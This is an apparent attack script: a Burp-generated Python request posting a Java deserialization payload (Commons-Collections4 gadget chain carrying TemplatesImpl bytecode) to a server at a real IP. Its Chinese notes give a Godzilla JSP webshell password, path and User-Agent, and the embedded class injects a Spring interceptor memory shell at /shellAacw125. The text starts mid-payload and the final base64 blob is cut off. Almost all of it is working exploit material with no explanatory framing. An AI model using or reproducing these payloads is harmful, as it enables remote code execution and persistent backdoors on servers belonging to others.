wcGxpY2F0aW9uRXZlbnRMaXN0ZW5lcgwA6ADrAQAcZ2V0QXBwbGljYXRpb25FdmVudExpc3RlbmVycwcBigwBiwGMDAB3AY0BABxzZXRBcHBsaWNhdGlvbkV2ZW50TGlzdGVuZXJzDAGOAY8MAZABkQwBcQGSAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2RlcgwBkwF+AQAMZGVjb2RlQnVmZmVyAQAQamF2YS9sYW5nL1N0cmluZwwBlAGDAQAQamF2YS51dGlsLkJhc2U2NAEACmdldERlY29kZXIBAAZkZWNvZGUBAB1qYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbQEAHGphdmEvaW8vQnl0ZUFycmF5SW5wdXRTdHJlYW0MAHcBlQEAHWphdmEvdXRpbC96aXAvR1pJUElucHV0U3RyZWFtDAB3AZYMAZcBmAwBmQGaDAGbAZwMAOIA4wcBnQwBngGfAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDAGgAXMMAHcBoQwBogGjDAGkAXUMAaUBpgEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgwBpwBtAQAUY29tL2V4YW1wbGUvZXhwL2Rhd2QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEADmphdmEvdXRpbC9MaXN0AQASamF2YS91dGlsL0l0ZXJhdG9yAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAramF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbgEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAWKClMamF2YS91dGlsL0l0ZXJhdG9yOwEAB2hhc05leHQBAAMoKVoBAARuZXh0AQAUKClMamF2YS9sYW5nL09iamVjdDsBAAdnZXROYW1lAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAAZrZXlTZXQBABEoKUxqYXZhL3V0aWwvU2V0OwEADWphdmEvdXRpbC9TZXQBAANnZXQBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAANhZGQBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAIdG9TdHJpbmcBABgoTGphdmEvbGFuZy9UaHJvd2FibGU7KVYBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBAA5nZXRDbGFzc0xvYWRlcgEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBAAtuZXdJbnN0YW5jZQEAEWphdmEvbGFuZy9JbnRlZ2VyAQAEVFlQRQEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABBqYXZhL3V0aWwvQXJyYXlzAQAGYXNMaXN0AQAlKFtMamF2YS9sYW5nL09iamVjdDspTGphdmEvdXRpbC9MaXN0OwEAGShMamF2YS91dGlsL0NvbGxlY3Rpb247KVYBAAd0b0FycmF5AQAVKClbTGphdmEvbGFuZy9PYmplY3Q7AQAEc2l6ZQEAAygpSQEAFShJKUxqYXZhL2xhbmcvT2JqZWN0OwEAB2Zvck5hbWUBAAlnZXRNZXRob2QBAAUoW0IpVgEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEABHJlYWQBAAUoW0IpSQEABXdyaXRlAQAHKFtCSUkpVgEAC3RvQnl0ZUFycmF5AQAEKClbQgEAF2phdmEvbGFuZy9yZWZsZWN0L0Z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"}
requests.post(burp0_url, headers=burp0_headers, data=burp0_data)

密码: Bfzwcmbggsdytqtff
地址: /*
请求头: User-Agent: Rechjn
脚本类型: JSP

写哥斯拉马脚本

import requests

burp0_url = "http://119.45.178.147:30000/"
burp0_cookies = {"JSESSIONID": "91540884E76F00EB1BF1A5AAD6B0B504"}
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "Origin": "http://119.45.178.147:30000", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": "http://119.45.178.147:30000/shellAacw125", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
burp0_data = {"data": "rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAQm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuVHJhbnNmb3JtaW5nQ29tcGFyYXRvci/5hPArsQjMAgACTAAJZGVjb3JhdGVkcQB+AAFMAAt0cmFuc2Zvcm1lcnQALUxvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnM0L1RyYW5zZm9ybWVyO3hwc3IAQG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuQ29tcGFyYWJsZUNvbXBhcmF0b3L79JkluG6xNwIAAHhwc3IAP29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuZnVuY3RvcnMuSW5zdGFudGlhdGVUcmFuc2Zvcm1lcjSL9H+khtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAKTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX+AYIVOACAAB4cAAAL8HK/rq+AAAANAFdCADRCADSCADTCgBXANQKAFYA1QoAVgDWCgBWANcKANgA2QoA2ADaCADbCgAmANwIAN0KAFYA3ggA3wgA4AgA4QgA4ggA4wcA5AgA5QcA5goAVgDnBwDoCADpCgATAOoIAHsKAFYA6wcA7AoAHADtCwDuAO8IAPAKABUA8QoAEwDyCgBWAPMKAFYA9AoAVgD1CgBWAPYHAPcIAIkHAIgJAPgA+QoAEwD6CgD7APwKAPgA/QoA+wD+BwD/CAEABwEBCAECCACTBwEDCgAzAQQIAQUKABMBBggBBwoAEwEICAEJCAEKCAELBwEMCgA8ANQHAQ0KAD4BDgcBDwoAQAEQCgBAAREKADwBEgoAPAETCgBWARQKARUA/AoBFQEWCgATARcHARgKABMBGQoASQEaCgATARsKAPsBHAoAMAEdCgD7AR4HAR8KAFABGgcBIAcBIQoAUgEiCgBTARoHASMHASQBAA1nZXRVcmxQYXR0ZXJuAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAGExjb20vZXhhbXBsZS9leHAvQXZ4ZXJiOwEADGdldENsYXNzTmFtZQEAD2dldEJhc2U2NFN0cmluZwEACkV4Y2VwdGlvbnMHASUBAAY8aW5pdD4BAAMoKVYBAAdjb250ZXh0AQASTGphdmEvbGFuZy9PYmplY3Q7AQALaW50ZXJjZXB0b3IBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7BwEmAQAQTWV0aG9kUGFyYW1ldGVycwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKZ2V0Q29udGV4dAEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQARcmVxdWVzdEF0dHJpYnV0ZXMBAAdzZXNzaW9uAQAOc2VydmxldENvbnRleHQBABJhcHBsaWNhdGlvbkNvbnRleHQBABNhcHBsaWNhdGlvbkNvbnRleHRzAQAZTGphdmEvdXRpbC9MaW5rZWRIYXNoU2V0OwEAC2NsYXNzTG9hZGVyAQAXTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAA1TdGFja01hcFRhYmxlBwEjBwD3BwDmBwDoBwEnBwEoAQAOZ2V0SW50ZXJjZXB0b3IBAAljbGF6ekJ5dGUBAAJbQgEAC2RlZmluZUNsYXNzAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAVjbGF6egEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAEdmFyOAEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwcA/wEADmFkZEludGVyY2VwdG9yAQAnKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvT2JqZWN0OylWAQAWYWJzdHJhY3RIYW5kbGVyTWFwcGluZwEAE2FkYXB0ZWRJbnRlcmNlcHRvcnMBABVMamF2YS91dGlsL0FycmF5TGlzdDsBABZMb2NhbFZhcmlhYmxlVHlwZVRhYmxlAQApTGphdmEvdXRpbC9BcnJheUxpc3Q8TGphdmEvbGFuZy9PYmplY3Q7PjsBAAxkZWNvZGVCYXNlNjQBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQAMZGVjb2RlckNsYXNzAQAHZGVjb2RlcgEABHZhcjQBAAliYXNlNjRTdHIBABJMamF2YS9sYW5nL1N0cmluZzsBAA5nemlwRGVjb21wcmVzcwEABihbQilbQgEADmNvbXByZXNzZWREYXRhAQADb3V0AQAfTGphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtOwEAAmluAQAeTGphdmEvaW8vQnl0ZUFycmF5SW5wdXRTdHJlYW07AQAGdW5nemlwAQAfTGphdmEvdXRpbC96aXAvR1pJUElucHV0U3RyZWFtOwEABmJ1ZmZlcgEAAW4BAAFJBwEMBwENBwEPAQAFZ2V0RlYBADgoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvT2JqZWN0OwEAA29iagEACWZpZWxkTmFtZQEABWZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEABGdldEYBAD8oTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAFExqYXZhL2xhbmcvQ2xhc3M8Kj47BwDkBwEYAQAMaW52b2tlTWV0aG9kAQAMdGFyZ2V0T2JqZWN0AQAKbWV0aG9kTmFtZQEAXShMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzcztbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAAWkBAAdtZXRob2RzAQAbW0xqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAFdmFyMTEBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBAAR2YXI5AQAiTGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uOwEABXZhcjEwAQAKcGFyYW1DbGF6egEAEltMamF2YS9sYW5nL0NsYXNzOwEABXBhcmFtAQATW0xqYXZhL2xhbmcvT2JqZWN0OwEABm1ldGhvZAEACXRlbXBDbGFzcwcBKQcAvwcBHwcBIAEAClNvdXJjZUZpbGUBAAtBdnhlcmIuamF2YQEADS9zaGVsbEFhY3cxMjUBAAZBcXdyZ2YBD2xINHNJQUFBQUFBQUFBSTFYQ1h3VTFSMyszaDZaWmJNY0psd1J1UVdTYkpKRkNDQUp0Q1FCSlpLRUl3Z0VySGF5TzBrV05ydkw3R3hDcEJRdlZDbzk3RzN0YlZ2YVlsdUV1a21rS3EydHR2YTBsN1dIUFd4cmF5Mjk3R0dycHQ5N005bHNMZ0R5bTNuNzN2LzgvdGViSjE5NzZCRUFWNGlsQW5rMSs3dk45allOUW1EYVhyMUxEOFgwZUh1b0xxYW5VZzBKUFdLWUd0d0NxeEptZXlpVk5LUHg5alpUN3pTNkUrYStVTGZSR2tvWlpsZk1zRUkxcVo1NGVLTWVqOFFNc3o1dUdXYllTRm9KTW5zRkpyWWIxa1pEeW1vaXE4RFU0cEtHSVZYTmxwUmFMZUNwUzBSNDZxMXBOK0tXRDM2QlNWbkdIWG9zelRPM3J1cytUQlNZSEkxSHJicDB5a3AwYnRGcEVJK0tTM1lJK0RhR1RTTzJWOS9ud3lXVW1LUVhBZ1dqdFFWUWlLa1Q0TUkwZ1NsNlcvaEt2WFg1S24zMTBxV1JwWkhWUHN3UWNCMElCMUJrRTExS25OWklqYStqNW9abzNHaEtkN1lhNW5hOU5XWkk4WW13SHR1aG0xSDUyOW4wV0IxUnF2WTEyUGhTNFdXWTRvY0g4d1V1TFc0WUUrbHE2WUc0VVdER09PZFN5RUlwWkRGcFJ2cFVtNDdHVkxpSy9TaVJhdkwwWk5LSVJ3VEtpMGNETURvQ0RqK1ZCRkVtUlpUVGZDdGhId1lRZ2s5dU1tWGNuWkVWQW9zdlNpaWxMY055UHpHc2xDdUY1a282dVpYWlZyeW50bVNrbzB3RFY3aVZqejIxQXZrUm80MWdxd002VFByNit0RWNBYXpCV2drS2d5TU9DR2lrMjEwaStRdUhTRGNja1BrWVRjUTE4RUNFcVY0Sk9oQUttejFNMUZCZE5ObEI1eG00THQyc0hEd2V3Y3hqUVVzRTAwM3MxbER0cUJnaFJFTURjNzdaMHNQN0d2V2trdy91bWczTlBteW1VOHpwK25qSzB1TmhicGVNaStKSXl3TFlpbTErTktKWllPNHdnbFRTQ0llYURTYSt0Y25vYWVZdkRkY3lyVWNLMXJDVEVhWDYyaDdMb0J1ZVlxSVVRQXQyKzdFTGUyeUV4ekJuaDB5N04vaXhBOWVUU1phQkpLMjNLVk5HT0cxR3JaNFFWU3ZTTjBLWFZqS0dXaVJ4VlRTdXg1aUpNdFJTVndTR1BHd1RtSkEwRGJ0ZENFU0tIWThIbTBtSFpTVkRHL2xvdGplMkdmdlRSc3FxdmlCWktwbUlwNHpxSENjMnQrNDF3bFoxeVc2QmVVTzdkZ0NzcUM2am1wTWJlNGRUeFdKR3V4NnJDWWVOVkNxSGloNkp0dUZ0eFZIREEvcVRHOU50Umx1TUo5RXVZM1BTTUlmcnE1WTFhcHFiMHdSMHJzMFRUWVJrZEdwTVUrL2hmakp0TVFxRzNrbFNMVVVyeUVVVHg4ZEJVY2dzanVpV1RoN1RSazVneVVWQ3pBd3hIUmdISGJrSXdLbXB3Kzc5QW5QT2I1eUdOd2tzdWloak5MeVpmZWJpVE5CdzA3Q1V0d09pNFJhQjJlZEZWc050anBJTEIwekQ3UUZvc2hHNmNDZHpPRHVlQW5nTGx1ZmpNTzRLSUdDZnY1VkloaE54UzQvR1dXdXpoclg4RHQxc2xpNnlCVEF6QTNnNzNpRkw4RzRCUDBVMkQ4WjVRWEhKaFNJZHdMdndicW40UFFJQjhxcGhhRmpTb3ZmWkZyMmZkcmF1ckZ4dmhOVjBuVDVXdzVHbCtRSGNLODMrWUFEclVDTlhIMlpRazNwUGpLUEhoNC9hNG1zc2NyU21MZVBDL2QrcGlBQStqdnZ5Y1FpZnNIdVAwOHdMaThkcTVKL0NjVDl1eGFjNVpVY2NhdmlzZlIzSUdZY0NSYU9sWkNmbC9maWNIeWZ3ZWVuSzRnQ3V4R3E1ZW9CK3BJYjVzV1FNUDhib0greHNwL0ZGNmNpRGpGSnlFT2FVRDcwUzVRZjlPQ0puYm43YzZCN3E3c012T2xsRXp1QkwwclNIZVJQSXliczArMUdua1pOcmp3ck16RFZ1ZTRlWjZKYlR4R25KWC9iakxMN0NIc0pVMG1NcE9WSEhhbndCZkJWZms3QStibWZzVHJackNkNk1RZU5ZR1Z2b3RuTk